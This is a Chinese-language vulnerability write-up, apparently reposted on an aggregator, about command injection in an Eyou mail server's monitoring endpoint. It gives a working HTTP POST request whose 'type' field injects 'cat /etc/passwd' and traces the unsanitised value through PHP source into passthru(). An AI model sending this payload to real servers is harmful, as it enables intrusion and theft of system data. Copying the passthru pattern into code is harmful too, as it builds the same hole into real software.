聲明：該文章來自（print("")）版權(quán)由原作者所有，K2OS渲染引擎提供網(wǎng)頁加速服務(wù)。

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1Host: 192.168.10.1Content-Length: 25Accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfncAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: EMPHPSID=ffah74s753ae239996a1mmbld0; empos=0Connection: closetype='|cat /etc/passwd||'

建議用dnslog 去探測。

代碼全局搜索moni_detail

找到了一個em_controller_action_app_mailadmin_moni_detail.class.php 的文件。然后再進去搜索gragh

根據(jù)這個函數(shù)

? ?/** ? ? ? ? ?? ? * 生成圖像 ?? ? * ? ? ? ? ? ? ? * @return void ? ? */ ? ?protected function _get_graph() ? ?{ ? ?? ? ? ?$cluster = $this->__request->get_request('cluster', ''); ? ? ? ?$hostname = $this->__request->get_request('hostname', 'elephant110'); ? ? ? ?$type = $this->__request->get_request('type', 'cpu_report'); ?? ? ? ?$date_type = $this->__request->get_request('date_type', 'hour'); ? ? ? ?$date_value = $this->__request->get_request('date_value', '1'); ? ? ? ?$columns = $this->__request->get_request('columns', 2); ? ? ? ?$size = $this->__request->get_request('size', 'small'); ? ? ? ?require_once PATH_EYOUM_LIB . 'em_monitor.class.php'; ? ? ? ?$graph = new em_monitor; ? ? ? ?$condition = em_condition::factory('monitor', 'report:get_report'); ? ? ? ?$condition->set_clustername($cluster); ? ? ? ?$condition->set_hostname($hostname); ? ? ? ?// 默認圖形 ? ? ? ?switch ($type) { ? ? ? ? ? ?case 'cpu_report': ? ? ? ? ? ?case 'mem_report': ? ? ? ? ? ?case 'network_report': ? ? ? ? ? ?case 'packet_report': ? ? ? ? ? ?case 'load_report': ? ? ? ? ? ? ? ?$condition->set_graph($type); ? ? ? ? ? ? ? ?break; ? ? ? ? ? ?// metric 圖形 ? ? ? ? ? ?default: ? ? ? ? ? ? ? ?$condition->set_graph('metric'); ? ? ? ? ? ? ? ?$condition->set_metricname($type); ? ? ? ? ? ? ? ?break; ? ? ? ?} ? ? ? ?$size_array = $this->_get_recover_size($type); ? ? ? ?$graph->set_graph_size($size_array); ? ? ? ?$condition->set_size($size); ? ? ? ?$start = em_monitor::get_start_timestamp($date_value . ' ' . $date_type); ? ? ? ?$condition->set_start($start); ? ? ? ?$condition->set_end('now'); ? ? ? ?$graph->set_graph($condition); ? ? ? ?$graph->set_debug(true); ? ? ? ?$graph->draw(); ? ?}

最終執(zhí)行到了draw這個函數(shù)。跟進draw函數(shù)

? ?/** ? ? * 畫出 rrdtool 圖形 ?? ? * ?? ? * @return void ? ? * @throws em_monitor_exception ? ? */ ? ?public function draw() ? ?{ ? ? ? ?$command = implode(' ', $this->__graph); ? ? ? ?/*Make sure the image is not cached*/ ? ? ? ?header ("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); ? // Date in the past ? ? ? ?header ("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); // always modified ? ? ? ?header ("Cache-Control: no-cache, must-revalidate"); ? // HTTP/1.1 ? ? ? ?header ("Pragma: no-cache"); ? ? ? ? ? ? ? ? ? ? // HTTP/1.0 ? ? ? ?if ($this->__debug) { ? ? ? ? ? ?$fp = fopen('/tmp/monitor.log', 'w'); ? ? ? ? ? ?fwrite($fp, $command . "\n"); ? ? ? ? ? ?fclose($fp); ? ? ? ?} ? ? ? ?header ("Content-type: image/gif"); ? ? ? ?passthru($command); ? ?}

這里通過了passthru 接受參數(shù)來生成的。然后導(dǎo)致了一個命令執(zhí)行的問題

[超站]友情鏈接：

四季很好，只要有你，文娛排行榜：https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全，洞悉企業(yè)級服務(wù)市場：https://www.ijiandao.com/